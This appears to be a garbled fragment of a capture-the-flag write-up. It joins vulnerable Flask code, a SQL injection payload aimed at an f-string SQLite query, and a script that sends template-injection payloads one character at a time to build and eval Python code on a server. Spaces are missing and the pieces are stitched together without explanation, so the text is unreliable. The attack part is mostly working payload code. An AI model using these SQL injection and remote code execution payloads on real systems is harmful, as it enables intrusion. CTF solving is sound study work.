target_url = "http://lamentxu.top" + url for i in blacklist: if i in url: return flask.abort(403, 'I blacklist the whole alphabet, hiahiahiahiahiahiahia~~~~~~') if"."in url: return flask.abort(403, 'No ssrf allowed') response = requests.get(target_url)
return flask.Response(response.content, response.status_code) defdb_search(code): with sqlite3.connect('database.db') as conn: cur = conn.cursor() cur.execute(f"SELECT FATE FROM FATETABLE WHERE NAME=UPPER(UPPER(UPPER(UPPER(UPPER(UPPER(UPPER('{code}')))))))") found = cur.fetchone() returnNoneif found isNoneelse found[0]
payload = '{"name": {"))))))) or 1=1 order by FATE DESC --+":"1"}}' binary_output = ''.join(format(ord(char), '08b') for char in payload) print(binary_output)
flag=True for i in payload: if flag: tmp=f'\n%import os;os.b="{i}"' flag=False else: tmp=f'\n%import os;os.b+="{i}"' r=requests.get(url,params={"payload":tmp}) r=requests.get(url,params={"payload":"\n%import os;eval(os.b)"}) r=requests.get(url,params={"payload":"\n%include('1')"}).text print(r)